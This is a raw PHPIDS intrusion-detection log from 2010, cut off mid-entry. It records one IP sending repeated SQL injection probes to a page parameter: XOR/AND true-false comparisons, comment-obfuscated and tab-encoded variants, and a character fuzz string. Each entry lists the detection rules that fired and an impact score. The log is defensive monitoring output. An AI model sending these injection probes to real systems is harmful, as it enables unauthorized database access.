Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123334
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:41
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123331
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:38
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123332
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:38
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123329
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:37
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123330
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:37
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123325
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:36
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123326
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:36
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123327
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:36
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123328
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:36
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123323
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:35
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123324
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20XoR%20%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 02:40:35
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123321
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:34
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123322
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:34
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123319
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:33
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123320
Name:GET.page
Value:security/?page=security/hackingillustrated/**/XoR/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/XoR/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:33
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123315
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:25
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123316
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:25
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123317
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:25
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123318
Name:GET.page
Value:security/?page=security/hackingillustrated%'/**/aND/**/'8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27/**/aND/**/%278%25%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:25
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123313
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:24
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123314
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:24
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123311
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:23
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123312
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:23
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123309
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:21
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123310
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='3
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:21
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123307
Name:REQUEST.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:17
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123308
Name:GET.page
Value:security/?page=security/hackingillustrated%' aND '8%'='8
Page:/i.php?page=security/?page=security/hackingillustrated%25%27%20aND%20%278%25%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:17
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123303
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123304
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123305
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123306
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/aND/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/aND/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:16
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123301
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:14
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123302
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=3
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D3
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:14
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123299
Name:REQUEST.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:08
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123300
Name:GET.page
Value:security/?page=security/hackingillustrated/**/aND/**/8=8
Page:/i.php?page=security/?page=security/hackingillustrated/**/aND/**/8%3D8
IP:60.4.51.66
Impact:6
Created:2010-05-03 02:40:08
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123297
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:06
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123298
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:06
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123295
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:05
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123296
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09aND%09%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:05
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123293
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:00
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123294
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%273
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:40:00
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123291
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:39:59
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123292
Name:GET.page
Value:security/?page=security/hackingillustrated' aND '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%20aND%20%278%27%3D%278
IP:60.4.51.66
Impact:46
Created:2010-05-03 02:39:59
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123289
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:60.4.51.66
Impact:24
Created:2010-05-03 02:39:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:123290
Name:GET.page
Value:security/?page=security/hackingillustrated'`([{^~
Page:/i.php?page=security/?page=security/hackingillustrated%27%60%28%5B%7B%5E%7E
IP:60.4.51.66
Impact:24
Created:2010-05-03 02:39:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.8666666666667
Converted: ((((+++::

ID:123287
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:49
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123288
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:49
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123285
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:48
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123286
Name:GET.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%273
IP:60.4.51.66
Impact:66
Created:2010-05-03 01:13:48
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123283
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:47
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123284
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%278
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:47
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123281
Name:REQUEST.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
Page:/i.php?page=security/?page=security/hackingillustrated%27%09XoR%09%278%27%3D%273
IP:60.4.51.66
Impact:38
Created:2010-05-03 01:13:46
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44

ID:123282
Name:GET.page
Value:security/?page=security/hackingillustrated' XoR '8'='3
